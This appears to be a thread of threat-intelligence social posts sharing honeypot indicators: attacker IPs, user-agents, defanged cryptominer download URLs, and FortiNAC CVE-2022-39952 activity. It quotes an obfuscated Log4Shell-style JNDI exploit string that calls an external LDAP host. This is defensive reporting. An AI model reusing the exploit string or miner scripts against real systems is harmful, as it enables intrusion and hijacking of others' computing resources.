We produce high fidelity, novel, and easy to consume threat intelligence data streams using a combination of our Sensor Network, Threat Harvester, and Correlation Engine. We will be posting recent IOC's that we have identified during our threat monitoring activities #DarkSkyIntel
Common User-Agents associated with web app cred attacks differ from typical botnet behavior/automated scanners:
- linux gnu (cow)
- curl/7.58.0
- mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/63.0.3239.84 safari/537.36
[3/3]
Top web app types targeted by threat actors for credentials attacks in June 2023, per our sensor network:
1. Apache
2. VMWare
3. Jenkins
4. Joomla
5. Hikvision
#threatintelligence#botnet#mirai
[1/3]
Time for another Top 15. Here are our #Top15ThreatIntel IP's that we have seen activity from on our Sensors that mimic ICS devices in the last 72 hours #CyberSecurity#ThreatIntel#SCADAsystems#ICSsecurity:
195[.]178.120.191 - Attributed to Mirai Botnet
141[.]95.103.178
[1/3]
Although scored high, it seems that this is primarily due to the persistence of this host authenticating and attempting to download this software, along with the number of sensors it has targeted.
[4/4]
Our sensor network has identified an IP address with the one of our highest scores in our system. This IP has been flagged for brute force attempts and attempts to install crypto mining software on our sensors:
Initial access started with brute force attempts...
[1/4]
The end goal for this host appears to be crypto mining, specifically relating to Monero cryptocurrency, as it attempts to download this setup script from GitHub:
https[:]//raw[.]githubusercontent[.]com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh
[3/4]
Our Sensor Network has detected #malware download activities. Here are a few file downloads we have seen threat actors pull down to our sensors. #CyberSecurity#ThreatIntelligence#cyberattacks:
ElfMiner/Coinminer
176[.]35.67.96 - hxxp://121[.]36.14.249/.s/rx.sh
[1/4]
Once these C3Pool related crypto miners are downloaded, the device is then used for its computing power in the collective effort of mining Monero coins. For the other crypto miner, it appears that it is associated with a Trojan downloader.
[3/3]
Our Sensor Network has detected a subset of IP addresses downloading cryptominer software on our sensors #cybersecurity#threatintelligence#cryptomining:
213[.]109.161.205
95[.]110.131.162
103[.]215.127.5
141[.]98.11.144
[1/3]
Cryptomining software was downloaded from the following URL's:
hxxp[:]//58[.]135.80.99/a/miner.sh
hxxp[:]//download[.]c3pool[.]org/xmrig_setup/raw/master/setup_c3pool_miner.sh
hxxps[:]//raw[.]githubusercontent[.]com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh
[2/3]
We are seeing an uptick in the exploitation of #FortiNAC CVE-2022-39952 throughout our sensor network, leading to the planting of various shell types. Threat actors appear to be using a variety of scripting tools to execute exploit code/scanners. #threatintel
IoCs 👇
[1/2]
Sample exploit string embedded in a user-agent: t('${${env:barfoo:-j}ndi${env:barfoo:-:}${env:barfoo:-l}dap${env:barfoo:-:}//5[.]255.109.233:1389/tomcatbypass/command/base64/y2qgl3rtccb8fcbjzca...
[2/2]